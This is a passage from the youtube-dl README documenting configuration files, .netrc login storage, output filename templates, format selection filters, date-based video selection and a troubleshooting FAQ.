of never (do nothing), warn (only\n emit a warning), detect_or_warn (the\n default; fix file if we can, warn\n otherwise)\n --prefer-avconv Prefer avconv over ffmpeg for running the\n postprocessors\n --prefer-ffmpeg Prefer ffmpeg over avconv for running the\n postprocessors (default)\n --ffmpeg-location PATH Location of the ffmpeg/avconv binary;\n either the path to the binary or its\n containing directory.\n --exec CMD Execute a command on the file after\n downloading and post-processing, similar to\n find's -exec syntax. Example: --exec 'adb\n push {} /sdcard/Music/ && rm {}'\n --convert-subs FORMAT Convert the subtitles to other format\n (currently supported: srt|ass|vtt|lrc)\n\n# CONFIGURATION\n\nYou can configure youtube-dl by placing any supported command line option to a configuration file. On Linux and macOS, the system wide configuration file is located at `/etc/youtube-dl.conf` and the user wide configuration file at `~/.config/youtube-dl/config`. On Windows, the user wide configuration file locations are `%APPDATA%\\youtube-dl\\config.txt` or `C:\\Users\\<user name>\\youtube-dl.conf`. Note that by default configuration file may not exist so you may need to create it yourself.\n\nFor example, with the following configuration file youtube-dl will always extract the audio, not copy the mtime, use a proxy and save all videos under `Movies` directory in your home directory:\n```\n# Lines starting with # are comments\n\n# Always extract audio\n-x\n\n# Do not copy the mtime\n--no-mtime\n\n# Use this proxy\n--proxy 127.0.0.1:3128\n\n# Save all videos under Movies directory in your home directory\n-o ~/Movies/%(title)s.%(ext)s\n```\n\nNote that options in configuration file are just the same options aka switches used in regular command line calls thus there **must be no whitespace** after `-` or `--`, e.g. `-o` or `--proxy` but not `- o` or `-- proxy`.\n\nYou can use `--ignore-config` if you want to disable the configuration file for a particular youtube-dl run.\n\nYou can also use `--config-location` if you want to use custom configuration file for a particular youtube-dl run.\n\n### Authentication with `.netrc` file\n\nYou may also want to configure automatic credentials storage for extractors that support authentication (by providing login and password with `--username` and `--password`) in order not to pass credentials as command line arguments on every youtube-dl execution and prevent tracking plain text passwords in the shell command history. You can achieve this using a [`.netrc` file](https://stackoverflow.com/tags/.netrc/info) on a per extractor basis. For that you will need to create a `.netrc` file in your `$HOME` and restrict permissions to read/write by only you:\n```\ntouch $HOME/.netrc\nchmod a-rwx,u+rw $HOME/.netrc\n```\nAfter that you can add credentials for an extractor in the following format, where *extractor* is the name of the extractor in lowercase:\n```\nmachine <extractor> login <login> password <password>\n```\nFor example:\n```\nmachine youtube login myaccount@gmail.com password my_youtube_password\nmachine twitch login my_twitch_account_name password my_twitch_password\n```\nTo activate authentication with the `.netrc` file you should pass `--netrc` to youtube-dl or place it in the [configuration file](#configuration).\n\nOn Windows you may also need to setup the `%HOME%` environment variable manually. For example:\n```\nset HOME=%USERPROFILE%\n```\n\n# OUTPUT TEMPLATE\n\nThe `-o` option allows users to indicate a template for the output file names.\n\n**tl;dr:** [navigate me to examples](#output-template-examples).\n\nThe basic usage is not to set any template arguments when downloading a single file, like in `youtube-dl -o funny_video.flv \"https://some/video\"`. However, it may contain special sequences that will be replaced when downloading each video. The special sequences may be formatted according to [python string formatting operations](https://docs.python.org/2/library/stdtypes.html#string-formatting). For example, `%(NAME)s` or `%(NAME)05d`. To clarify, that is a percent symbol followed by a name in parentheses, followed by formatting operations. Allowed names along with sequence type are:\n\n - `id` (string): Video identifier\n - `title` (string): Video title\n - `url` (string): Video URL\n - `ext` (string): Video filename extension\n - `alt_title` (string): A secondary title of the video\n - `display_id` (string): An alternative identifier for the video\n - `uploader` (string): Full name of the video uploader\n - `license` (string): License name the video is licensed under\n - `creator` (string): The creator of the video\n - `release_date` (string): The date (YYYYMMDD) when the video was released\n - `timestamp` (numeric): UNIX timestamp of the moment the video became available\n - `upload_date` (string): Video upload date (YYYYMMDD)\n - `uploader_id` (string): Nickname or id of the video uploader\n - `channel` (string): Full name of the channel the video is uploaded on\n - `channel_id` (string): Id of the channel\n - `location` (string): Physical location where the video was filmed\n - `duration` (numeric): Length of the video in seconds\n - `view_count` (numeric): How many users have watched the video on the platform\n - `like_count` (numeric): Number of positive ratings of the video\n - `dislike_count` (numeric): Number of negative ratings of the video\n - `repost_count` (numeric): Number of reposts of the video\n - `average_rating` (numeric): Average rating give by users, the scale used depends on the webpage\n - `comment_count` (numeric): Number of comments on the video\n - `age_limit` (numeric): Age restriction for the video (years)\n - `is_live` (boolean): Whether this video is a live stream or a fixed-length video\n - `start_time` (numeric): Time in seconds where the reproduction should start, as specified in the URL\n - `end_time` (numeric): Time in seconds where the reproduction should end, as specified in the URL\n - `format` (string): A human-readable description of the format \n - `format_id` (string): Format code specified by `--format`\n - `format_note` (string): Additional info about the format\n - `width` (numeric): Width of the video\n - `height` (numeric): Height of the video\n - `resolution` (string): Textual description of width and height\n - `tbr` (numeric): Average bitrate of audio and video in KBit/s\n - `abr` (numeric): Average audio bitrate in KBit/s\n - `acodec` (string): Name of the audio codec in use\n - `asr` (numeric): Audio sampling rate in Hertz\n - `vbr` (numeric): Average video bitrate in KBit/s\n - `fps` (numeric): Frame rate\n - `vcodec` (string): Name of the video codec in use\n - `container` (string): Name of the container format\n - `filesize` (numeric): The number of bytes, if known in advance\n - `filesize_approx` (numeric): An estimate for the number of bytes\n - `protocol` (string): The protocol that will be used for the actual download\n - `extractor` (string): Name of the extractor\n - `extractor_key` (string): Key name of the extractor\n - `epoch` (numeric): Unix epoch when creating the file\n - `autonumber` (numeric): Number that will be increased with each download, starting at `--autonumber-start`\n - `playlist` (string): Name or id of the playlist that contains the video\n - `playlist_index` (numeric): Index of the video in the playlist padded with leading zeros according to the total length of the playlist\n - `playlist_id` (string): Playlist identifier\n - `playlist_title` (string): Playlist title\n - `playlist_uploader` (string): Full name of the playlist uploader\n - `playlist_uploader_id` (string): Nickname or id of the playlist uploader\n\nAvailable for the video that belongs to some logical chapter or section:\n\n - `chapter` (string): Name or title of the chapter the video belongs to\n - `chapter_number` (numeric): Number of the chapter the video belongs to\n - `chapter_id` (string): Id of the chapter the video belongs to\n\nAvailable for the video that is an episode of some series or programme:\n\n - `series` (string): Title of the series or programme the video episode belongs to\n - `season` (string): Title of the season the video episode belongs to\n - `season_number` (numeric): Number of the season the video episode belongs to\n - `season_id` (string): Id of the season the video episode belongs to\n - `episode` (string): Title of the video episode\n - `episode_number` (numeric): Number of the video episode within a season\n - `episode_id` (string): Id of the video episode\n\nAvailable for the media that is a track or a part of a music album:\n\n - `track` (string): Title of the track\n - `track_number` (numeric): Number of the track within an album or a disc\n - `track_id` (string): Id of the track\n - `artist` (string): Artist(s) of the track\n - `genre` (string): Genre(s) of the track\n - `album` (string): Title of the album the track belongs to\n - `album_type` (string): Type of the album\n - `album_artist` (string): List of all artists appeared on the album\n - `disc_number` (numeric): Number of the disc or other physical medium the track belongs to\n - `release_year` (numeric): Year (YYYY) when the album was released\n\nEach aforementioned sequence when referenced in an output template will be replaced by the actual value corresponding to the sequence name. Note that some of the sequences are not guaranteed to be present since they depend on the metadata obtained by a particular extractor. Such sequences will be replaced with placeholder value provided with `--output-na-placeholder` (`NA` by default).\n\nFor example for `-o %(title)s-%(id)s.%(ext)s` and an mp4 video with title `youtube-dl test video` and id `BaW_jenozKcj`, this will result in a `youtube-dl test video-BaW_jenozKcj.mp4` file created in the current directory.\n\nFor numeric sequences you can use numeric related formatting, for example, `%(view_count)05d` will result in a string with view count padded with zeros up to 5 characters, like in `00042`.\n\nOutput templates can also contain arbitrary hierarchical path, e.g. `-o '%(playlist)s/%(playlist_index)s - %(title)s.%(ext)s'` which will result in downloading each video in a directory corresponding to this path template. Any missing directory will be automatically created for you.\n\nTo use percent literals in an output template use `%%`. To output to stdout use `-o -`.\n\nThe current default template is `%(title)s-%(id)s.%(ext)s`.\n\nIn some cases, you don't want special characters such as 中, spaces, or &, such as when transferring the downloaded filename to a Windows system or the filename through an 8bit-unsafe channel. In these cases, add the `--restrict-filenames` flag to get a shorter title:\n\n#### Output template and Windows batch files\n\nIf you are using an output template inside a Windows batch file then you must escape plain percent characters (`%`) by doubling, so that `-o \"%(title)s-%(id)s.%(ext)s\"` should become `-o \"%%(title)s-%%(id)s.%%(ext)s\"`. However you should not touch `%`'s that are not plain characters, e.g. environment variables for expansion should stay intact: `-o \"C:\\%HOMEPATH%\\Desktop\\%%(title)s.%%(ext)s\"`.\n\n#### Output template examples\n\nNote that on Windows you may need to use double quotes instead of single.\n\n```bash\n$ youtube-dl --get-filename -o '%(title)s.%(ext)s' BaW_jenozKc\nyoutube-dl test video ''_ä↭𝕐.mp4 # All kinds of weird characters\n\n$ youtube-dl --get-filename -o '%(title)s.%(ext)s' BaW_jenozKc --restrict-filenames\nyoutube-dl_test_video_.mp4 # A simple file name\n\n# Download YouTube playlist videos in separate directory indexed by video order in a playlist\n$ youtube-dl -o '%(playlist)s/%(playlist_index)s - %(title)s.%(ext)s' https://www.youtube.com/playlist?list=PLwiyx1dc3P2JR9N8gQaQN_BCvlSlap7re\n\n# Download all playlists of YouTube channel/user keeping each playlist in separate directory:\n$ youtube-dl -o '%(uploader)s/%(playlist)s/%(playlist_index)s - %(title)s.%(ext)s' https://www.youtube.com/user/TheLinuxFoundation/playlists\n\n# Download Udemy course keeping each chapter in separate directory under MyVideos directory in your home\n$ youtube-dl -u user -p password -o '~/MyVideos/%(playlist)s/%(chapter_number)s - %(chapter)s/%(title)s.%(ext)s' https://www.udemy.com/java-tutorial/\n\n# Download entire series season keeping each series and each season in separate directory under C:/MyVideos\n$ youtube-dl -o \"C:/MyVideos/%(series)s/%(season_number)s - %(season)s/%(episode_number)s - %(episode)s.%(ext)s\" https://videomore.ru/kino_v_detalayah/5_sezon/367617\n\n# Stream the video being downloaded to stdout\n$ youtube-dl -o - BaW_jenozKc\n```\n\n# FORMAT SELECTION\n\nBy default youtube-dl tries to download the best available quality, i.e. if you want the best quality you **don't need** to pass any special options, youtube-dl will guess it for you by **default**.\n\nBut sometimes you may want to download in a different format, for example when you are on a slow or intermittent connection. The key mechanism for achieving this is so-called *format selection* based on which you can explicitly specify desired format, select formats based on some criterion or criteria, setup precedence and much more.\n\nThe general syntax for format selection is `--format FORMAT` or shorter `-f FORMAT` where `FORMAT` is a *selector expression*, i.e. an expression that describes format or formats you would like to download.\n\n**tl;dr:** [navigate me to examples](#format-selection-examples).\n\nThe simplest case is requesting a specific format, for example with `-f 22` you can download the format with format code equal to 22. You can get the list of available format codes for particular video using `--list-formats` or `-F`. Note that these format codes are extractor specific. \n\nYou can also use a file extension (currently `3gp`, `aac`, `flv`, `m4a`, `mp3`, `mp4`, `ogg`, `wav`, `webm` are supported) to download the best quality format of a particular file extension served as a single file, e.g. `-f webm` will download the best quality format with the `webm` extension served as a single file.\n\nYou can also use special names to select particular edge case formats:\n\n - `best`: Select the best quality format represented by a single file with video and audio.\n - `worst`: Select the worst quality format represented by a single file with video and audio.\n - `bestvideo`: Select the best quality video-only format (e.g. DASH video). May not be available.\n - `worstvideo`: Select the worst quality video-only format. May not be available.\n - `bestaudio`: Select the best quality audio only-format. May not be available.\n - `worstaudio`: Select the worst quality audio only-format. May not be available.\n\nFor example, to download the worst quality video-only format you can use `-f worstvideo`.\n\nIf you want to download multiple videos and they don't have the same formats available, you can specify the order of preference using slashes. Note that slash is left-associative, i.e. formats on the left hand side are preferred, for example `-f 22/17/18` will download format 22 if it's available, otherwise it will download format 17 if it's available, otherwise it will download format 18 if it's available, otherwise it will complain that no suitable formats are available for download.\n\nIf you want to download several formats of the same video use a comma as a separator, e.g. `-f 22,17,18` will download all these three formats, of course if they are available. Or a more sophisticated example combined with the precedence feature: `-f 136/137/mp4/bestvideo,140/m4a/bestaudio`.\n\nYou can also filter the video formats by putting a condition in brackets, as in `-f \"best[height=720]\"` (or `-f \"[filesize>10M]\"`).\n\nThe following numeric meta fields can be used with comparisons `<`, `<=`, `>`, `>=`, `=` (equals), `!=` (not equals):\n\n - `filesize`: The number of bytes, if known in advance\n - `width`: Width of the video, if known\n - `height`: Height of the video, if known\n - `tbr`: Average bitrate of audio and video in KBit/s\n - `abr`: Average audio bitrate in KBit/s\n - `vbr`: Average video bitrate in KBit/s\n - `asr`: Audio sampling rate in Hertz\n - `fps`: Frame rate\n\nAlso filtering work for comparisons `=` (equals), `^=` (starts with), `$=` (ends with), `*=` (contains) and following string meta fields:\n\n - `ext`: File extension\n - `acodec`: Name of the audio codec in use\n - `vcodec`: Name of the video codec in use\n - `container`: Name of the container format\n - `protocol`: The protocol that will be used for the actual download, lower-case (`http`, `https`, `rtsp`, `rtmp`, `rtmpe`, `mms`, `f4m`, `ism`, `http_dash_segments`, `m3u8`, or `m3u8_native`)\n - `format_id`: A short description of the format\n - `language`: Language code\n\nAny string comparison may be prefixed with negation `!` in order to produce an opposite comparison, e.g. `!*=` (does not contain).\n\nNote that none of the aforementioned meta fields are guaranteed to be present since this solely depends on the metadata obtained by particular extractor, i.e. the metadata offered by the video hoster.\n\nFormats for which the value is not known are excluded unless you put a question mark (`?`) after the operator. You can combine format filters, so `-f \"[height <=? 720][tbr>500]\"` selects up to 720p videos (or videos where the height is not known) with a bitrate of at least 500 KBit/s.\n\nYou can merge the video and audio of two formats into a single file using `-f <video-format>+<audio-format>` (requires ffmpeg or avconv installed), for example `-f bestvideo+bestaudio` will download the best video-only format, the best audio-only format and mux them together with ffmpeg/avconv.\n\nFormat selectors can also be grouped using parentheses, for example if you want to download the best mp4 and webm formats with a height lower than 480 you can use `-f '(mp4,webm)[height<480]'`.\n\nSince the end of April 2015 and version 2015.04.26, youtube-dl uses `-f bestvideo+bestaudio/best` as the default format selection (see [#5447](https://github.com/ytdl-org/youtube-dl/issues/5447), [#5456](https://github.com/ytdl-org/youtube-dl/issues/5456)). If ffmpeg or avconv are installed this results in downloading `bestvideo` and `bestaudio` separately and muxing them together into a single file giving the best overall quality available. Otherwise it falls back to `best` and results in downloading the best available quality served as a single file. `best` is also needed for videos that don't come from YouTube because they don't provide the audio and video in two different files. If you want to only download some DASH formats (for example if you are not interested in getting videos with a resolution higher than 1080p), you can add `-f bestvideo[height<=?1080]+bestaudio/best` to your configuration file. Note that if you use youtube-dl to stream to `stdout` (and most likely to pipe it to your media player then), i.e. you explicitly specify output template as `-o -`, youtube-dl still uses `-f best` format selection in order to start content delivery immediately to your player and not to wait until `bestvideo` and `bestaudio` are downloaded and muxed.\n\nIf you want to preserve the old format selection behavior (prior to youtube-dl 2015.04.26), i.e. you want to download the best available quality media served as a single file, you should explicitly specify your choice with `-f best`. You may want to add it to the [configuration file](#configuration) in order not to type it every time you run youtube-dl.\n\n#### Format selection examples\n\nNote that on Windows you may need to use double quotes instead of single.\n\n```bash\n# Download best mp4 format available or any other best if no mp4 available\n$ youtube-dl -f 'bestvideo[ext=mp4]+bestaudio[ext=m4a]/best[ext=mp4]/best'\n\n# Download best format available but no better than 480p\n$ youtube-dl -f 'bestvideo[height<=480]+bestaudio/best[height<=480]'\n\n# Download best video only format but no bigger than 50 MB\n$ youtube-dl -f 'best[filesize<50M]'\n\n# Download best format available via direct link over HTTP/HTTPS protocol\n$ youtube-dl -f '(bestvideo+bestaudio/best)[protocol^=http]'\n\n# Download the best video format and the best audio format without merging them\n$ youtube-dl -f 'bestvideo,bestaudio' -o '%(title)s.f%(format_id)s.%(ext)s'\n```\nNote that in the last example, an output template is recommended as bestvideo and bestaudio may have the same file name.\n\n\n# VIDEO SELECTION\n\nVideos can be filtered by their upload date using the options `--date`, `--datebefore` or `--dateafter`. They accept dates in two formats:\n\n - Absolute dates: Dates in the format `YYYYMMDD`.\n - Relative dates: Dates in the format `(now|today)[+-][0-9](day|week|month|year)(s)?`\n \nExamples:\n\n```bash\n# Download only the videos uploaded in the last 6 months\n$ youtube-dl --dateafter now-6months\n\n# Download only the videos uploaded on January 1, 1970\n$ youtube-dl --date 19700101\n\n$ # Download only the videos uploaded in the 200x decade\n$ youtube-dl --dateafter 20000101 --datebefore 20091231\n```\n\n# FAQ\n\n### How do I update youtube-dl?\n\nIf you've followed [our manual installation instructions](https://ytdl-org.github.io/youtube-dl/download.html), you can simply run `youtube-dl -U` (or, on Linux, `sudo youtube-dl -U`).\n\nIf you have used pip, a simple `sudo pip install -U youtube-dl` is sufficient to update.\n\nIf you have installed youtube-dl using a package manager like *apt-get* or *yum*, use the standard system update mechanism to update. Note that distribution packages are often outdated. As a rule of thumb, youtube-dl releases at least once a month, and often weekly or even daily. Simply go to https://yt-dl.org to find out the current version. Unfortunately, there is nothing we youtube-dl developers can do if your distribution serves a really outdated version. You can (and should) complain to your distribution in their bugtracker or support forum.\n\nAs a last resort, you can also uninstall the version installed by your package manager and follow our manual installation instructions. For that, remove the distribution's package, with a line like\n\n sudo apt-get remove -y youtube-dl\n\nAfterwards, simply follow [our manual installation instructions](https://ytdl-org.github.io/youtube-dl/download.html):\n\n```\nsudo wget https://yt-dl.org/downloads/latest/youtube-dl -O /usr/local/bin/youtube-dl\nsudo chmod a+rx /usr/local/bin/youtube-dl\nhash -r\n```\n\nAgain, from then on you'll be able to update with `sudo youtube-dl -U`.\n\n### youtube-dl is extremely slow to start on Windows\n\nAdd a file exclusion for `youtube-dl.exe` in Windows Defender settings.\n\n### I'm getting an error `Unable to extract OpenGraph title` on YouTube playlists\n\nYouTube changed their playlist format in March 2014 and later on, so you'll need at least youtube-dl 2014.07.25 to download all YouTube videos.\n\nIf you have installed youtube-dl with a package manager, pip, setup.py or a tarball, please use that to update. Note that Ubuntu packages do not seem to get updated anymore. Since we are not affiliated with Ubuntu, there is little we can do. Feel free to [report bugs](https://bugs.launchpad.net/ubuntu/+source/youtube-dl/+filebug) to the [Ubuntu packaging people](mailto:ubuntu-motu@lists.ubuntu.com?subject=outdated%20version%20of%20youtube-dl) - all they have to do is update the package to a somewhat recent version. See above for a way to update.\n\n### I'm getting an error when trying to use output template: `error: using output template conflicts with using title, video ID or auto number`\n\nMake sure you are not using `-o` with any of these options `-t`, `--title`, `--id`, `-A` or `--auto-number` set in command line or in a configuration file. Remove the latter if any.\n\n### Do I always have to pass `-citw`?\n\nBy default, youtube-dl intends to have the best options (incidentally, if you have a convincing case that these should be different, [please file an issue where you explain that](https://yt-dl.org/bug)). Therefore, it is unnecessary and sometimes harmful to copy long option strings from webpages. In particular, the only option out of `-citw` that is regularly useful is `-i`.\n\n### Can you please put the `-b` option back?\n\nMost people asking this question are not aware that youtube-dl now defaults to downloading the highest available quality as reported by YouTube, which will be 1080p or 720p in some cases, so you no longer need the `-b` option. For some specific videos, maybe YouTube does not report them to be available in a specific high quality format you're interested in. In that case, simply request it with the `-f` option and youtube-dl will try to download it.\n\n### I get HTTP error 402 when trying to download a video. What's this?\n\nApparently YouTube requires you to pass a CAPTCHA test if you download too much. We're [considering to provide a way to let you solve the CAPTCHA](https://github.com/ytdl-org/youtube-dl/issues/154), but at the moment, your best course of action is pointing a web browser to the youtube URL, solving the CAPTCHA, and restart youtube-dl.\n\n### Do I need any other programs?\n\nyoutube-dl works fine on its own on most sites. However, if you want to convert video/audio, you'll need [avconv](https://libav.org/) or [ffmpeg](https://www.ffmpeg.org/). On some sites - most notably YouTube - videos can be retrieved in a higher quality format without sound. youtube-dl will detect whether avconv/ffmpeg is present and automatically pick the best option.\n\nVideos or video formats streamed via RTMP protocol can only be downloaded when [rtmpdump](https://rtmpdump.mplayerhq.hu/) is installed. Downloading MMS and RTSP videos requires either [mplayer](https://mplayerhq.hu/) or [mpv](https://mpv.io/) to be installed.\n\n### I have downloaded a video but how can I play it?\n\nOnce the video is fully downloaded, use any video player, such as [mpv](https://mpv.io/), [vlc](https://www.videolan.org/) or [mplayer](https://www.mplayerhq.hu/).\n\n### I extracted a video URL with `-g`, but it does not play on another machine / in my web browser.\n\nIt depends a lot on the service. In many cases, requests for the video (to download/play it) must come from the same IP address and with the same cookies and/or HTTP headers. Use the `--cookies` option to write the required cookies into a file, and advise your downloader to read cookies from that file. Some sites also require a common user agent to be used, use `--dump-user-agent` to see the one in use by youtube-dl. You can also get necessary cookies and HTTP headers from JSON output obtained with `--dump-json`.\n\nIt may be beneficial to use IPv6; in some cases, the restrictions are only applied to IPv4. Some services (sometimes only for a subset of videos) do not restrict the video URL by IP address, cookie, or user-agent, but these are the exception rather than the rule.\n\nPlease bear in mind that some URL protocols are **not** supported by browsers out of the box, including RTMP. If you are using `-g`, your own downloader must support these as well.\n\nIf you want to play the video on a machine that is not running youtube-dl, you can relay the video content from the machine that runs youtube-dl. You can use `-o -` to let youtube-dl stream a video to stdout, or simply allow the player to download the files written by youtube-dl in turn.\n\n### ERROR: no fmt_url_map or conn information found in video info\n\nYouTube has switched to a new video info format in July 2011 which is not supported by old versions of youtube-dl. See [above](#how-do-i-update-youtube-dl) for how to update youtube-dl.\n\n### ERROR: unable to download video\n\nYouTube requires an additional signature since September 2012 which is not supported by old versions of youtube-dl. See [above](#how-do-i-update-youtube-dl) for how to update youtube-dl.\n\n### Video URL contains an ampersand and I'm getting some strange output `[1] 2839` or `'v' is not recognized as an internal or external command`\n\nThat's actually the output from your shell. Since ampersand is one of the special shell characters it's interpreted by the shell preventing you from passing the whole URL to youtube-dl. To disable your shell from interpreting the ampersands (or any other special characters) you have to either put the whole URL in quotes or escape them with a backslash (which approach will work depends on your shell).\n\nFor example if your URL is https://www.youtube.com/watch?t=4&v=BaW_jenozKc you should end up with following command:\n\n```youtube-dl 'https://www.youtube.com/watch?t=4&v=BaW_jenozKc'```\n\nor\n\n```youtube-dl https://www.youtube.com/watch?t=4\\&v=BaW_jenozKc```\n\nFor Windows you have to use the double quotes:\n\n```youtube-dl \"https://www.youtube.com/watch?t=4&v=BaW_jenozKc\"```\n\n### ExtractorError: Could not find JS function u'OF'\n\nIn February 2015, the new YouTube player contained a character sequence in a string that was misinterpreted by old versions of youtube-dl. See [above](#how-do-i-update-youtube-dl) for how to update youtube-dl.\n\n### HTTP Error 429: Too Many Requests or 402: Payment Required\n\nThese two error codes indicate that the service is blocking your IP address because of overuse. Usually this is a soft block meaning that you can gain access again after solving CAPTCHA. Just open a browser and solve a CAPTCHA the service suggests you and after that [pass cookies](#how-do-i-pass-cookies-to-youtube-dl) to youtube-dl. Note that if your machine has multiple external IPs then you should also pass exactly the same IP you've used for solving CAPTCHA with [`--source-address`](#network-options). Also you may need to pass a `User-Agent` HTTP header of your browser with [`--user-agent`](#workarounds).\n\nIf this is not the case (no CAPTCHA suggested to solve by the service) then you can contact the service and ask them to unblock your IP address, or - if you have acquired a whitelisted IP address already - use the [`--proxy` or `--source-address` options](#network-options) to select another IP address.\n\n### SyntaxError: Non-ASCII character\n\nThe error\n\n File \"youtube-dl\", line 2\n SyntaxError: Non-ASCII character '\\x93' ...\n\nmeans you're using an outdated version of Python. Please update to Python 2.6 or 2.7.\n\n### What is this binary file? Where has the code gone?\n\nSince June 2012 ([#342](https://github.com/ytdl-org/youtube-dl/issues/342)) youtube-dl is packed as an executable zipfile, simply unzip it (might need renaming to `youtube-dl.zip` first on some systems) or clone the git repository, as laid out above. If you modify the code, you can run it by executing the `__main__.py` file. To recompile the executable, run `make youtube-dl`.\n\n### The exe throws an error due to missing `MSVCR100.dll`\n\nTo run the exe you need to install first the [Microsoft Visual C++ 2010 Redistributable Package (x86)](https://www.microsoft.com/en-US/download/details.aspx?id=5555).\n\n### On Windows, how should I set up ffmpeg and youtube-dl? Where should I put the exe files?\n\nIf you put youtube-dl and ffmpeg in the same directory that you're running the command from, it will work, but that's rather cumbersome.\n\nTo make a different directory work - either for ffmpeg, or for youtube-dl, or for both - simply create the directory (say, `C:\\bin`, or `C:\\Users\\<User name>\\bin`), put all the executables directly in there, and then [set your PATH environment variable](https://www.java.com/en/download/help/path.xml) to include that directory.\n\nFrom then on, after restarting your shell, you will be able to access both youtube-dl and ffmpeg (and youtube-dl will be able to find ffmpeg) by simply typing `youtube-dl` or `ffmpeg`, no matter what directory you're in.\n\n### How do I put downloads into a specific folder?\n\nUse the `-o` to specify an [output template](#output-template), for example `-o \"/home/user/videos/%(title)s-%(id)s.%(ext)s\"`. If you want this for all of your downloads, put the option into your [configuration file](#configuration).\n\n### How do I download a video starting with a `-`?\n\nEither prepend `https://www.youtube.com/watch?v=` or separate the ID from the options with `--`:\n\n youtube-dl -- -wNyEUrxzFU\n youtube-dl \"https://www.youtube.com/watch?v=-wNyEUrxzFU\"\n\n### How do I pass cookies to youtube-dl?\n\nUse the `--cookies` option, for example `--cookies /path/to/cookies/file.txt`.\n\nIn order to extract cookies from browser use any conforming browser extension for exporting cookies. For example, [Get cookies.txt](https://chrome.google.com/webstore/detail/get-cookiestxt/bgaddhkoddajcdgocldbbfleckgcbcid/) (for Chrome) or [cookies.txt](https://addons.mozilla.org/en-US/firefox/addon/cookies-txt/) (for Firefox).\n\nNote that the cookies file must be in Mozilla/Netscape format and the first line of the cookies file must be either `# HTTP Cookie File` or `# Netscape HTTP Cookie File`. Make sure you have correct [newline format](https://en.wikipedia.org/wiki/Newline) in the cookies file and convert newlines if necessary to correspond with your OS, namely `CRLF` (`\\r\\n`) for Windows and `LF` (`\\n`) for Unix and Unix-like systems (Linux, macOS, etc.). `HTTP Error 400: Bad Request` when using `--cookies` is a good sign of invalid newline format.\n\nPassing cookies to youtube-dl is a good way to workaround login when a particular extractor does not implement it explicitly. Another use case is working around [CAPTCHA](https://en.wikipedia.org/wiki/CAPTCHA) some websites require you to solve in particular cases in order to get access (e.g. YouTube, CloudFlare).\n\n### How do I stream directly to media player?\n\nYou will first need to tell youtube-dl to stream media to stdout with `-o -`, and also tell your media player to read from stdin (it must be capable of this for streaming) and then pipe former to latter. For example, streaming to [vlc](https://www.videolan.org/) can be achieved with:\n\n youtube-dl -o - \"https://www.youtube.com/watch?v=BaW_jenozKcj\" | vlc -\n\n### How do I download only new videos from a playlist?\n\nUse download-archive feature. With this feature you should initially download the complete playlist with `--download-archive /path/to/download/archive/file.txt` that will record identifiers of all the videos in a special file. Each subsequent run with the same `--download-archive` will download only new videos and skip all videos that have been downloaded before. Note that only successful downloads are recorded in the file.\n\nFor example, at first,\n\n youtube-dl --download-archive archive.txt \"https://www.youtube.com/playlist?list=PLwiyx1dc3P2JR9N8gQaQN_BCvlSlap7re\"\n\nwill download the complete `PLwiyx1dc3P2JR9N8gQaQN_BCvlSlap7re` playlist and create a file `archive.txt`. Each subsequent run will only download new videos if any:\n\n youtube-dl --download-archive archive.txt \"https://www.youtube.com/playlist?list=PLwiyx1dc3P2JR9N8gQaQN_BCvlSlap7re\"\n\n### Should I add `--hls-prefer-native` into my config?\n\nWhen youtube-dl detects an HLS video, it can download it either with the built-in downloader or ffmpeg. Since many HLS streams are slightly invalid and ffmpeg/youtube-dl each handle some invalid cases better than the other, there is an option to switch the downloader if needed.\n\nWhen youtube-dl knows that one particular downloader works better for a given website, that downloader will be picked. Otherwise, youtube-dl will pick the best downloader for general compatibility, which at the moment happens to be ffmpeg. This choice may change in future versions of youtube-dl, with improvements of the built-in downloader and/or ffmpeg.\n\nIn particular, the generic extractor (used when your website is not in the [list of supported sites by youtube-dl](https://ytdl-org.github.io/youtube-dl/supportedsites.html) cannot mandate one specific downloader.\n\nIf you put either `--hls-prefer-native` or `--hls-prefer-ffmpeg` into your configuration, a different subset of videos will fail to download correctly. Instead, it is much better to [file an issue](https://yt-dl.org/bug) or a pull request which details why the native or the ffmpeg HLS downloader is a better choice for your use case.\n\n### Can you add support for this anime video site, or site which shows current movies for free?\n\nAs a matter of policy (as well as legality), youtube-dl does not include support for services that specialize in infringing copyright. As a rule of thumb, if you cannot easily find a video that the service is quite obviously allowed to distribute (i.e. that has been uploaded by the creator, the creator's distributor, or is published under a free license), the service is probably unfit for inclusion to youtube-dl.\n\nA note on the service that they don't host the infringing content, but just link to those who do, is evidence that the service should **not** be included into youtube-dl. The same goes for any DMCA note when the whole front page of the service is filled with videos they are not allowed to distribute. A \"fair use\" note is equally unconvincing if the service shows copyright-protected videos in full without authorization.\n\nSupport requests for services that **do** purchase the rights to distribute their content are perfectly fine though. If in doubt, you can simply include a source that mentions the legitimate purchase of content.\n\n### How can I speed up work on my issue?\n\n(Also known as: Help, my important issue not being solved!) The youtube-dl core developer team is quite small. While we do our best to solve as many issues as possible, sometimes that can take quite a while. To speed up your issue, here's what you can do:\n\nFirst of all, please do report the issue [at our issue tracker](https://yt-dl.org/bugs). That allows us to coordinate all efforts by users and developers, and serves as a unified point. Unfortunately, the youtube-dl project has grown too large to use personal email as an effective communication channel.\n\nPlease read the [bug reporting instructions](#bugs) below. A lot of bugs lack all the necessary information. If you can, offer proxy, VPN, or shell access to the youtube-dl developers. If you are able to, test the issue from multiple computers in multiple countries to exclude local censorship or misconfiguration issues.\n\nIf nobody is interested in solving your issue, you are welcome to take matters into your own hands and submit a pull request (or coerce/pay somebody else to do so).\n\nFeel free to bump the issue from time to time by writing a small comment (\"Issue is still present in youtube-dl version ...from France, but fixed from Belgium\"), but please not more than once a month. Please do not declare your issue as `important` or `urgent`.\n\n### How can I detect whether a given URL is supported by youtube-dl?\n\nFor one, have a look at the [list of supported sites](docs/supportedsites.md). Note that it can sometimes happen that the site changes its URL scheme (say, from https://example.com/video/1234567 to https://example.com/v/1234567 ) and youtube-dl reports an URL of a service in that list as unsupported. In that case, simply report a bug.\n\nIt is *not* possible to detect whether a URL is supported or not. That's because youtube-dl contains a generic extractor which matches **all** URLs. You may be tempted to disable, exclude, or remove the generic extractor, but the generic extractor not only allows users to extract videos from lots of websites that embed a video from another service, but may also be used to extract video from a service that it's hosting itself. Therefore, we neither recommend nor support disabling, excluding, or removing the generic extractor.\n\nIf you want to find out whether a given URL is supported, simply call youtube-dl with it. If you get no videos back, chances are the URL is either not referring to a video or unsupported. You can find out which by examining the output (if you run youtube-dl on the console) or catching an `UnsupportedError` exception if you run it from a Python program.\n\n# Why do I need to go through that much red tape when filing bugs?\n\nBefore we had the issue template, despite our extensive [bug reporting instructions](#bugs), about 80% of the issue reports we got were useless, for instance because people used 